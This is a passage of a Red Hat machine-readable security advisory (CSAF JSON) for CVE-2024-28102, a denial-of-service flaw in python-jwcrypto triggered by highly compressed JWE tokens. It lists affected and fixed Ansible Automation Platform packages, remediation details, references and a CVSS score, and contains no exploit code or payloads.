"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-server-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-server-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-ui-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el9ap.noarch"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2268758"
}
],
"notes": [
{
"category": "description",
"text": "An uncontrolled resource consumption vulnerability was found in python-jwcrypto. If a malicious JWE token with a high compression ratio is passed to the server, the server will consume a lot of memory and processing time, leading to a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "python-jwcrypto: malicious JWE token can cause denial of service",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "The CVE-2024-28102 vulnerability in JWCrypto represents a moderate severity issue due to its potential impact on system availability and resource consumption. While the vulnerability allows for a denial of service (DoS) attack, it requires an attacker to craft a malicious JWE Token with a high compression ratio. This specific condition limits the practical exploitability of the vulnerability to some extent, as it demands a more sophisticated attack approach than common vulnerabilities. Nonetheless, if exploited, the vulnerability can lead to significant memory exhaustion and increased server processing time, impacting the overall performance and availability of the affected system.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64"
],
"known_not_affected": [
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-server-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-server-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-ui-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el9ap.noarch"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-28102"
},
{
"category": "external",
"summary": "RHBZ#2268758",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2268758"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-28102",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-28102"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-28102",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28102"
},
{
"category": "external",
"summary": "https://github.com/latchset/jwcrypto/commit/90477a3b6e73da69740e00b8161f53fea19b831f",
"url": "https://github.com/latchset/jwcrypto/commit/90477a3b6e73da69740e00b8161f53fea19b831f"
},
{
"category": "external",
"summary": "https://github.com/latchset/jwcrypto/security/advisories/GHSA-j857-7rvv-vj97",
"url": "https://github.com/latchset/jwcrypto/security/advisories/GHSA-j857-7rvv-vj97"
}
],
"release_date": "2024-03-08T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-07-12T01:43:40+00:00",
"details": "Red Hat Ansible Automation Platform",
"product_ids": [
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:4522"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options don\u0027t meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-server-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-server-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-ui-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-server-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.noarch",
